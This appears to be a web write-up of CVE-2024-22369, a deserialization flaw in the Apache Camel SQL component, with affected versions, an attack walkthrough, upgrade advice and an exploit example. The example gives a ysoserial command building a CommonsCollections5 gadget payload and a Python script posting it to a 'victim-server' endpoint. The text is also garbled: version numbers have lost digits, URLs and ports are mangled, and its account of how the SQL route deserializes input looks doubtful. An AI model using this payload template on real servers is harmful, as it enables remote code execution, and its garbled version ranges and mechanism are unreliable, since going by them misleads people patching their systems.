CVE-2024-22369 - Deserialization of Untrusted Data in Apache Camel SQL Component — Full Analysis & Exploit Example

CVE-2024-22369 uncovers a serious vulnerability in the Apache Camel SQL component resulting from unsafe deserialization of untrusted data. This flaw affects critical Apache Camel versions, specifically:

4.1. before 4.4.

If you use the SQL component in these versions, attackers may be able to execute arbitrary code by sending crafted serialized Java objects. Immediate upgrade to a patched version is strongly recommended.

What’s the Deserialization Vulnerability?

Deserialization issues happen when an application accepts data (usually over a network) that was serialized (turned into a byte stream) by someone else, and trusts it without validation. If this data is malicious, the attacker can trigger code execution on the system.

In Apache Camel’s SQL component, unsafe deserialization occurs when processing inputs (for example, SQL query parameters) originating from user-controlled sources.

Who Is Affected?

- Apache Camel 3.x users: If you're on any version from 3.. up before 3.21.4, or you are on 3.22. before 3.22.1, you are vulnerable.
- Apache Camel 4.x users: If you're between 4.. and 4..3, or between 4.1. and 4.3.x, you are vulnerable.

How Does the Exploit Work?

1. Crafted Data Injection: The attacker submits a malicious serialized object as a parameter to a Camel route using the SQL component.
2. Unsafe Deserialization: The vulnerable Camel version deserializes this object without proper checks.
3. Remote Code Execution: The attacker’s object is set up to execute arbitrary code when deserialized (using a Java gadget chain).
4. System Compromise: The code runs on the Camel server, potentially leading to full server takeover.

Suppose you have a publicly accessible Camel route like this

<route>
    <from uri="jetty:http://...:808/orders"/>;
    <to uri="sql:INSERT INTO orders (description) VALUES (:#description)?dataSource=dataSource"/>
</route>

If an attacker controls the description parameter and it's deserialized unsafely, they could inject a serialized Java gadget payload instead of plain text.

Exploit Code Example

Below is a simplified exploit snippet demonstrating how an attacker might send a malicious serialized object to a vulnerable Camel SQL component.

Step 1: Create a Malicious Serialized Object (Java)

This example uses ysoserial to generate a payload that opens Calculator:

java -jar ysoserial.jar CommonsCollections5 'calc.exe' > payload.bin

Python code example

import requests

# Read the serialized payload
with open('payload.bin', 'rb') as f:
    payload = f.read()

# Send as parameter to the vulnerable endpoint
res = requests.post(
    "http://victim-server:808/orders";,
    files={"description": ("payload.bin", payload)}
)
print("Status code:", res.status_code)

Upgrade Steps

1. Update your Maven/Gradle dependency to the patched version.

Test to ensure your routes work as expected.

Additional Defenses:

Do not trust user-controlled input for deserialization.

- Use allow-lists for serializable types, or disable Java serialization for parameters entirely (if possible).

References

- Apache Camel Security Advisory (CVE-2024-22369)
- NVD Entry for CVE-2024-22369
- ysoserial Gadget Chains
- OWASP Deserialization Cheatsheet

Conclusion

CVE-2024-22369 is a high-impact, easy-to-exploit deserialization flaw in Apache Camel’s SQL component. Every user of affected Camel versions should patch immediately and audit their routes for unsafe deserialization practices. If you’re not ready to upgrade, restrict access to vulnerable endpoints as a temporary risk reduction—but don’t delay updating for the long run!

Timeline

Published on: 02/20/2024 15:15:10 UTC
Last modified on: 11/05/2024 20:35:19 UTC